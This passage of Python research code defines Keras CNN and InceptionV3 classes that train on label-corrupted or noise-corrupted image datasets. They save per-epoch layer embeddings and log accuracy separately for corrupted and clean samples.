embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[2]
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[3]
history.append(outs[0])
batch_number+=1
np.save('{}training_emb_e{}'.format(lcp_gnf,epoch_number), embedding_)
del embedding_
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def train(self, dataset):
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
        # one-hot encode the labels unless they already come as a 2-D array
        if np.ndim(y_train) != 2:
            y_train = keras.utils.to_categorical(y_train)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_split=0.2)
self.training_history=history
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
class CNN():
'''
Convolutional Neural Network for experiments on ImageNet
input, crop(2,2),
conv(200,5,5), bn, relu, maxpool(3,3),
conv(200,5,5), bn, relu, maxpool(3,3),
dense(384), bn, relu,
dense(192), bn, relu,
dense(n_classes), softmax
Params
deep: int (how many convolution blocks)
Default 2
wide: int (how many neurons in the first dense connection)
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 32
n_classes: int
Default 10
'''
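    # A minimal construction sketch (illustrative only; `imagenet10` stands
    # for any dataset object exposing x_train/y_train/x_test/y_test as
    # train() uses):
    #
    #     net = CNN(deep=2, wide=384, epochs=9, input_shape=299,
    #               save_fold='probes/imagenet')
    #     net.train(imagenet10)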
def __init__(self, deep=2, wide=384, optimizer='SGD', lr=1e-2, epochs=9,
batch_size=64, input_shape=299, n_classes=10, save_fold='', **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
if input_shape<227:
cropping=2
else:
cropping = (input_shape-227)/2
cnn = keras.models.Sequential()
cnn.add(keras.layers.Cropping2D(cropping=((cropping,cropping),(cropping,cropping)), input_shape=(input_shape,input_shape,3)))
counter = 0
while counter<deep:
cnn.add(keras.layers.Conv2D(200, (5,5)))
cnn.add((keras.layers.BatchNormalization()))
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.MaxPool2D(pool_size=(3,3)))
counter+=1
cnn.add(keras.layers.Flatten())
cnn.add(keras.layers.Dense(wide))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.Dense(wide/2))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
        cnn.add(keras.layers.Dense(n_classes, activation=activation))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=cnn.input, output=cnn.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
        self.model = model
        self.epochs = epochs
        self.batch_size = batch_size
        self.n_classes = n_classes
        self.deep = deep  # train_and_compute_rcvs needs this to pick probe layers
        self.save_fold = save_fold
def train(self, dataset):
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
x_train -= np.mean(x_train)
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train = y_train[idxs_train]
x_test = dataset.x_test
y_test = dataset.y_test
x_test = x_test / 255.0
x_test -= np.mean(x_test)
idxs_test = np.arange(len(x_test))
np.random.shuffle(idxs_test)
x_test = np.asarray(x_test[idxs_test])
y_test = y_test[idxs_test]
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_test.shape
except:
y_test = keras.utils.to_categorical(y_test, self.n_classes)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_data=(x_test, y_test))
self.training_history=history
def train_and_compute_rcvs(self, dataset):
x_train = dataset.x_train/255.
x_train -= np.mean(x_train)
y_train = dataset.y_train
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train= np.asarray(y_train)
y_train = y_train[idxs_train]
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train)
history=[]
embeddings=[]
batch_size=self.batch_size
self.model.summary()  # summary() already prints; wrapping it in print only emitted "None"
#layers_of_interest = [layer.name for layer in self.model.layers[2:-1]]
if self.deep==2:
layer_idxs = [9,13,16]
if self.deep==3:
layer_idxs = [9,12,14]
if self.deep==4:
layer_idxs = [9,12,15,19,22]
if self.deep==5:
layer_idxs = [9,12,15,18,22,25]
layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in layer_idxs]
print('loi', layers_of_interest)
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
while epoch_number <= self.epochs:
print(epoch_number)
batch_number = 0
embedding_=[]
for l in layers_of_interest:
#print 'in layer ', l
#print 'output shape ', self.model.get_layer(l).output.shape
#print 'metrics tensors, ', self.model.metrics_tensors
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
x = self.model.get_layer(l).output.shape[-3]
y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
space = np.zeros((len(x_train), x*y*z))
embedding_.append(space)
while batch_number <= n_batches:
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]= outs[2].reshape((min(batch_size,len(outs[2])),-1))
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[3].reshape((len(outs[3]),-1))
embedding_[2][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[4].reshape((len(outs[4]),-1))
#embedding_[3][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[5].reshape((len(outs[5]),-1))
history.append(outs[0])
batch_number+=1
#print self.save_fold
source = self.save_fold  # previously hard-coded: '/mnt/nas2/results/IntermediateResults/Mara/probes/imagenet/2H_lcp0.5'
c=0
if True:
for l in layers_of_interest:
if 'max_pooling' in l:
tosave_= np.mean(embedding_[c].reshape(12775, 23*23,200), axis=1)
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), tosave_)
else:
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), embedding_[c])
c+=1
del embedding_
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def _custom_eval(self, x, y, batch_size):
## correcting shape-related issues
x = x.reshape(x.shape[0], x.shape[2], x.shape[3], x.shape[4])
y = y.reshape(y.shape[0],-1)
#
scores = []
losses = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
tot_batches = len(y) / batch_size
# looping over data
while val_batch_no < tot_batches:
score = self.model.test_on_batch(x[start_batch:end_batch, :299, :299, :3],
y[start_batch:end_batch])
losses.append(score[0])
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print("Val: {}".format(np.mean(np.asarray(scores))))
return np.mean(np.asarray(losses)), np.mean(np.asarray(scores))
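# Note (added): _custom_eval iterates over full batches only, so up to
# batch_size-1 trailing samples are silently dropped, and inputs are cropped
# to 299x299x3 before test_on_batch; it returns the mean loss and mean accuracy.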
def train_and_monitor_with_rcvs(self, dataset, layers_of_interest=[], directory_save='',custom_epochs=0):
'''
Train and Monitor with RCVs
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Similar to train_and_compute_rcvs, but we additionally keep track
of accuracy and partial accuracy (split into true and false labels),
and we keep track of the embeddings corresponding to true and
false labels.
The function saves the embeddings at each epoch in a .npy file.
The mask of corrupted labels is saved in a separate .npy file.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Inputs:
dataset: object of class MNISTRandom, ImageNet10Random or Cifar10Random
provides the training data (dataset.x_train, dataset.y_train)
name: string
gives the dataset name and whether the dataset is corrupted with label corruption (lcp)
or gaussian noise in the inputs (gnf). For example, if the dataset is imagenet and we want
to specify the respective lcp (x.xlcp_) or gnf (x.xgnf_) values,
we write datasetname_x.x followed by the name of the corruption, e.g.
imagenet_0.8lcp_ for label corruption with probability 0.8
or imagenet_0.5gnf_ for a gaussian noise fraction of 0.5
layers_of_interest: list
specifies which layers to extract the embeddings from,
e.g. [6,11,14]
'''
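# Hedged call sketch (assumption, not in the original code): layers_of_interest
# holds integer indices into self.model.layers, e.g.
#     model.train_and_monitor_with_rcvs(dataset, layers_of_interest=[6, 11, 14])
# Note that the directory_save argument is immediately overridden by
# self.save_fold below, so it is effectively ignored.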
directory_save = self.save_fold
# train data with the original ordering (not shuffled yet)
x_train = dataset.x_train/255.
x_train -= np.mean(x_train)
y_train = dataset.y_train
# validation data with original ordering (not shuffled yet)
x_val = np.asarray(dataset.x_test, dtype=np.float64)
x_val -= np.mean(x_val)
y_val = dataset.y_test
# setting the seed for random
try:
np.random.seed(dataset.seed)
except:
np.random.seed(0)
# mask of bool values set to true if the corresponding datapoint
# was corrupted
train_mask = dataset.train_mask
# We shuffle the dataset indices in a new array
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
# List of corrupted and uncorrupted indices in
# the original ordering of the data
corrupted_idxs = np.argwhere(train_mask == True)
uncorrupted_idxs = np.argwhere(train_mask == False)
try:
#import pdb; pdb.set_trace()
np.save('{}/corrupted_idxs.npy'.format(directory_save), corrupted_idxs)
except:
print("ERROR saving corr idxs")
try:
np.save('{}/uncorrupted_idxs.npy'.format(directory_save), uncorrupted_idxs)
except:
print("ERROR saving uncorr idxs")
## x_train and y_train contain the data with the new shuffling
orig_x_train=x_train
orig_y_train=y_train
x_train = np.asarray(x_train[idxs_train])
y_train = y_train[idxs_train]
#y_train = dataset.y_train
#if x_train
#x_train = x_train / 255.0
# converting the labels to categorical
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train)
# converting also the original labels to categorical
# (for custom_eval_)
try:
shape1, shape2 = orig_y_train.shape
except:
orig_y_train = keras.utils.to_categorical(orig_y_train)
# variables for logs and monitoring
history=[]
embeddings=[]
batch_size=self.batch_size
self.model.summary()
##### NOTE: the loi change from model to model
layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in layers_of_interest]
print('loi', layers_of_interest)
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
while epoch_number <= self.epochs:
print(epoch_number)
batch_number = 0
embedding_=[]
for l in layers_of_interest:
#print 'in layer ', l
#print 'output shape ', self.model.get_layer(l).output.shape
#print 'metrics tensors, ', self.model.metrics_tensors
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
x = self.model.get_layer(l).output.shape[-3]
y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
space = np.zeros((len(x_train), z))
embedding_.append(space)
while batch_number <= n_batches:
#print("Batch {}/{}".format(batch_number, n_batches))
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
_n,_x,_y,_z= outs[2].shape
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]= np.mean(outs[2].reshape(_n, _x*_y,_z), axis=1) #outs[2].reshape((min(batch_size,len(outs[2])),-1))
_n,_x,_y,_z= outs[3].shape
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]= np.mean(outs[3].reshape(_n, _x*_y,_z), axis=1) #outs[3].reshape((len(outs[3]),-1))
#embedding_[2][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[4].reshape((len(outs[4]),-1))
#embedding_[3][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[5].reshape((len(outs[5]),-1))
#print outs, outs
history.append(outs[0])
batch_number+=1
c=0
'''
if True:
for l in layers_of_interest:
if 'max_pooling' in l:
#import pdb; pdb.set_trace()
import pdb; pdb.set_trace()
_n,_x,_y,_z= embedding_[c].shape
tosave_= np.mean(embedding_[c].reshape(_n, _x*_y, _z), axis=1)
np.save('{}/_training_emb_e{}_l{}'.format(source,epoch_number, l), tosave_)
#np.mean(embedding_[0].reshape(12775, 31*31,200), axis=1).shape
else:
np.save('{}/_training_emb_e{}_l{}'.format(source,epoch_number, l), embedding_[c])
c+=1
del embedding_
'''
for l in layers_of_interest:
np.save('{}/_training_emb_e{}_l{}'.format(directory_save,epoch_number, l), embedding_[c])
c+=1
del embedding_
# here we check the partial accuracy
if epoch_number %10 == 0:
corrupted_loss, corrupted_acc = self._custom_eval(orig_x_train[corrupted_idxs],
orig_y_train[corrupted_idxs],
batch_size
)
if len(uncorrupted_idxs) > 0:
uncorrupted_loss, uncorrupted_acc = self._custom_eval(orig_x_train[uncorrupted_idxs],
orig_y_train[uncorrupted_idxs],
batch_size
)
try:
with open(directory_save+'/uncorr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(uncorrupted_acc))
with open(directory_save+'/uncorr_loss.txt', 'a') as log_file:
log_file.write("{}, ".format(uncorrupted_loss))
except:
with open(directory_save+'/uncorr_acc.txt', 'w') as log_file:
log_file.write("{}, ".format(uncorrupted_acc))
with open(directory_save+'/uncorr_loss.txt', 'w') as log_file:
log_file.write("{}, ".format(uncorrupted_loss))
try:
with open(directory_save+'/corr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(corrupted_acc))
with open(directory_save+'/corr_loss.txt', 'a') as log_file:
log_file.write("{}, ".format(corrupted_loss))
except:
with open(directory_save+'/corr_acc.txt', 'w') as log_file:
log_file.write("{}, ".format(corrupted_acc))
with open(directory_save+'/corr_loss.txt', 'w') as log_file:
log_file.write("{}, ".format(corrupted_loss))
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
class CNNImagenet():
'''
### NOTE: architecture modified to do ImageNet well
Convolutional Neural Network for experiments on ImageNet
input, crop(2,2),
conv(200,5,5), bn, relu, maxpool(3,3),
conv(200,5,5), bn, relu, maxpool(3,3),
dense(384), bn, relu,
dense(192), bn, relu,
dense(n_classes), softmax
Params
deep: int (how many convolution blocks)
Default 2
wide: int (how many neurons in the first dense connection)
Default 384
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 9
batch_size: int
Default: 14
input_shape: int
Default 299
n_classes: int
Default 10
'''
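# Hedged usage sketch (assumption): same interface as CNN above, but with a
# fixed 299x299x3 input cropped to 227x227 by the (36,36) cropping layer.
#     net = CNNImagenet(deep=2, batch_size=14, n_classes=10)
#     net.train_and_compute_rcvs(my_imagenet_dataset)  # my_imagenet_dataset is a placeholder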
def __init__(self, deep=2, wide=384, optimizer='SGD', lr=1e-2, epochs=9,
batch_size=14, input_shape=299, n_classes=10, **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
cnn = keras.models.Sequential()
cnn.add(keras.layers.Cropping2D(cropping=((36,36),(36,36)), input_shape=(299,299,3)))
counter = 0
while counter<deep:
cnn.add(keras.layers.Conv2D(200, (5,5)))
cnn.add((keras.layers.BatchNormalization()))
cnn.add(keras.layers.Activation('relu'))
if counter<2:
cnn.add(keras.layers.MaxPool2D(pool_size=(3,3)))
counter+=1
cnn.add(keras.layers.GlobalAveragePooling2D())
#cnn.add(keras.layers.Flatten())
cnn.add(keras.layers.Dense(wide))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.Dense(wide/2))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
cnn.add(keras.layers.Dense(n_classes, activation=keras.layers.Activation(activation)))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=cnn.input, output=cnn.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
self.deep=deep
def train(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
x_train -= np.mean(x_train)
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train = y_train[idxs_train]
x_test = dataset.x_test
y_test = dataset.y_test
x_test = x_test / 255.0
x_test -= np.mean(x_test)
idxs_test = np.arange(len(x_test))
np.random.shuffle(idxs_test)
x_test = np.asarray(x_test[idxs_test])
y_test = y_test[idxs_test]
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_test.shape
except:
y_test = keras.utils.to_categorical(y_test, self.n_classes)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_data=(x_test, y_test))
self.training_history=history
def train_and_compute_rcvs(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train/255.
x_train -= np.mean(x_train)
y_train = dataset.y_train
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train= np.asarray(y_train)
y_train = y_train[idxs_train]
#if x_train
#x_train = x_train / 255.0
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train)
history=[]
embeddings=[]
batch_size=self.batch_size
self.model.summary()
#import pdb; pdb.set_trace()
#layers_of_interest = [layer.name for layer in self.model.layers[2:-1]]
if self.deep==2:
layer_idxs = [9,13,16]
if self.deep==3:
layer_idxs = [9,12,14]
if self.deep==4:
layer_idxs = [9,12,15,19,22]
if self.deep==5:
layer_idxs = [9,12,15,18,22,25]
layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in layer_idxs]
print('loi', layers_of_interest)
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
#if epoch_number > 1:
while epoch_number <= self.epochs:
print(epoch_number)
batch_number = 0
embedding_=[]
for l in layers_of_interest:
print('in layer ', l)
print('output shape ', self.model.get_layer(l).output.shape)
print('metrics tensors, ', self.model.metrics_tensors)
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
x = self.model.get_layer(l).output.shape[-3]
y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
space = np.zeros((len(x_train), x*y*z))
embedding_.append(space)
while batch_number <= n_batches:
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
#import pdb;pdb.set_trace()
#print out[0]
#import pdb; pdb.set_trace()
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]= outs[2].reshape((min(batch_size,len(outs[2])),-1))
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[3].reshape((len(outs[3]),-1))
embedding_[2][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[4].reshape((len(outs[4]),-1))
#embedding_[3][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[5].reshape((len(outs[5]),-1))
#print outs, outs
history.append(outs[0])
batch_number+=1
#import pdb; pdb.set_trace()
source = '/mnt/nas2/results/IntermediateResults/Mara/probes/imagenet/2H_lcp0.4'
c=0
if True:
for l in layers_of_interest:
if 'max_pooling' in l:
#import pdb; pdb.set_trace()
tosave_= np.mean(embedding_[c].reshape(12775, 23*23,200), axis=1)
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), tosave_)
#np.mean(embedding_[0].reshape(12775, 31*31,200), axis=1).shape
else:
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), embedding_[c])
c+=1
del embedding_
#embeddings.append(embedding_)
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
'''
#### Old, used for CIFAR
class CNN():
Convolutional Neural Network for experiments on CIFAR
input, crop(2,2),
conv(200,5,5), bn, relu, maxpool(3,3),
conv(200,5,5), bn, relu, maxpool(3,3),
dense(384), bn, relu,
dense(192), bn, relu,
dense(n_classes), softmax
Params
deep: int (how many convolution blocks)
Default 2
wide: int (how many neurons in the first dense connection)
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 32
n_classes: int
Default 10
def __init__(self, deep=2, wide=384, optimizer='SGD', lr=1e-2, epochs=10,
batch_size=32, input_shape=32, n_classes=10, **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
cnn = keras.models.Sequential()
cnn.add(keras.layers.Cropping2D(cropping=((2,2),(2,2)), input_shape=(32,32,3)))
counter = 0
while counter<deep:
cnn.add(keras.layers.Conv2D(200, (5,5)))
cnn.add((keras.layers.BatchNormalization()))
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.MaxPool2D(pool_size=(3,3)))
counter+=1
cnn.add(keras.layers.Flatten())
cnn.add(keras.layers.Dense(wide))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.Dense(wide/2))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
cnn.add(keras.layers.Dense(n_classes, activation=keras.layers.Activation(activation)))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=cnn.input, output=cnn.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
def train(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_split=0.2)
self.training_history=history
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
'''
class InceptionV3():
'''
InceptionV3 architecture with options
to learn RCVs over training, or to instantiate a
flawed network
Input Parameters
optimizer: string, default Adam
lr: float, default 0.01
beta_1: float, default 0.9
beta_2: float, default 0.999
epochs: int, default 1000
batch_size: int, default 32
input_shape: int, default 299
n_classes: int, default 47
'''
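# Hedged usage sketch (assumption; names are placeholders):
#     inc = InceptionV3(lr=0.01, epochs=1000, batch_size=32, n_classes=47)
#     inc.train(my_dataset)  # expects x_train/y_train/x_val/y_val fields
#     acts = inc.get_activations(x_batch, 'mixed10')  # 'mixed10' is a standard InceptionV3 layer name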
def __init__(self, optimizer='Adam', lr=0.01, beta_1=0.9, beta_2=0.999,
epsilon=None, decay=0.0, amsgrad=False, epochs=1000,
batch_size=32, input_shape=299, n_classes=47, **kwargs):
model = keras.applications.inception_v3.InceptionV3(include_top=True,
weights=None,#'imagenet', #None,
input_tensor=None,
input_shape=(input_shape,input_shape,3),
pooling=None,
classes=n_classes)
model.compile(
keras.optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, decay=decay, amsgrad=amsgrad),  # fixed: beta_2 was mistakenly set to beta_1
loss = keras.losses.categorical_crossentropy,
metrics=['acc']
)
'''
model.compile(
keras.optimizers.SGD(lr=lr, momentum=0.9, decay=decay, nesterov=True),
loss = keras.losses.categorical_crossentropy,
metrics=['acc']
)
'''
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
def get_activations(self, inputs, layer):
get_layer_output = K.function([self.model.layers[0].input],
[self.model.get_layer(layer).output])
feats = get_layer_output([inputs])
return feats[0]
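# Note (added): K is assumed to be keras.backend, imported earlier in this
# file; K.function builds a one-shot forward pass returning the activations
# of `layer` for the given inputs.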
def train(self, dataset, custom_epochs=0):
'''
Trains the network on the dataset.
The input dataset is an object with the fields
dataset.x_train, dataset.y_train, dataset.x_val, dataset.y_val
'''
x_train = dataset.x_train
x_train = np.asarray(x_train, dtype=np.float32)
y_train = dataset.y_train
x_val = dataset.x_val
x_val = np.asarray(x_val, dtype=np.float32)
y_val = dataset.y_val
# We first need to shuffle the dataset indexes then we launch training
shuffle_idxs_train = np.arange(len(x_train))
np.random.shuffle(shuffle_idxs_train)
shuffle_idxs_val = np.arange(len(x_val))
np.random.shuffle(shuffle_idxs_val)
# We also first clean the data
x_train[:,:,:,:3] -= np.mean(x_train[:,:,:,:3])
x_train[:,:,:,:3] /= np.std(x_train[:,:,:,:3])
x_val -= np.mean(x_val[:,:,:,:3])
x_val /= np.std(x_val[:,:,:,:3])
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_val.shape
except:
y_val = keras.utils.to_categorical(y_val, self.n_classes)
# We instantiate an image data generator to extract random crops of size 299x299x3
# from the images in x_train
datagen = ImageDataGenerator(featurewise_center=False,
featurewise_std_normalization=False,
random_cropping=True
)
datagen.fit(x_train[shuffle_idxs_train, :, :, :3])
train_generator = datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=self.batch_size
)
if custom_epochs>0:
epochs = custom_epochs
else:
epochs = self.epochs
history = self.model.fit_generator(train_generator,
steps_per_epoch= len(x_train)/self.batch_size,
epochs=epochs,
validation_data=(x_val[shuffle_idxs_val],
y_val[shuffle_idxs_val]),
)
#history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_slit=0.2)
self.training_history=history
def train_and_compute_rcvs(self, dataset, layers_of_interest=[], custom_epochs=0):
import time
# making the data ready for training
x_train = dataset.x_train
x_train = np.asarray(x_train, dtype=np.float32)
y_train = dataset.y_train
x_val = dataset.x_val
x_val = np.asarray(x_val, dtype=np.float32)
y_val = dataset.y_val
# We first need to shuffle the dataset indexes then we launch training
shuffle_idxs_train = np.arange(len(x_train))
np.random.shuffle(shuffle_idxs_train)
try:
localtime = time.localtime(time.time())
directory_save = '/mnt/nas2/results/IntermediateResults/Mara/probes/experiment_{}.{}_{}.{}'.format(localtime.tm_mday, localtime.tm_mon, localtime.tm_hour, localtime.tm_min)
os.mkdir(directory_save)
except:
print("ERROR: could not create the results directory")
np.save(directory_save+'/shuffle_idxs_training', shuffle_idxs_train)
shuffle_idxs_val = np.arange(len(x_val))
np.random.shuffle(shuffle_idxs_val)
np.save(directory_save+'/shuffle_idxs_validation', shuffle_idxs_val)
# We clean the data
x_train[:,:,:,:3] -= np.mean(x_train[:,:,:,:3])
x_train[:,:,:,:3] /= np.std(x_train[:,:,:,:3])
x_val -= np.mean(x_val[:,:,:,:3])
x_val /= np.std(x_val[:,:,:,:3])
#import pdb; pdb.set_trace()
# At this point in time the mean and std of the image data are respectively 0 and 1
# The mask of the image boundaries is left untouched (checked via pdb)
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
